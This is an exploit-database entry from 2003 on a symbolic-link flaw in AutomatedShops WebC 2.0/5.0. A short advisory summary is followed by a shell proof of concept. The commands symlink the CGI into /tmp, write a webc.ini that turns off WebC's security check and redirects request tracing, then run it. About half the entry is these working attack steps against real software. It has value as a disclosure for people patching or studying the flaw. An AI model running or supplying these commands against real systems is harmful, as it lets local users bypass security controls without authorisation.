AutomatedShops WebC 2.0/5.0 - Symbolic Link Following Configuration File
| EKU-ID: 27935 | CVE: | OSVDB-ID: |
| Author: Carl Livitt | Published: 2003-04-03 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 27935 | CVE: | OSVDB-ID: |
| Author: Carl Livitt | Published: 2003-04-03 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
source: https://www.securityfocus.com/bid/7272/info It has been reported that WebC will execute in the directory of a symbolic link from which it is invoked. Because of this, it may be possible for a local user to load a configuration file that enabled dangerous variables. $ cd /tmp $ ln -s /usr/local/apache/cgi-bin/webc.cgi webc.cgi $ cp /usr/local/apache/cgi-bin/webc.emf . $ echo "WEBC_NO_SECURITY_CHECK=True" > webc.ini $ echo "HTML_TRACE_REQUEST=/tmp/.debug1" >> webc.ini $ ./webc.cgi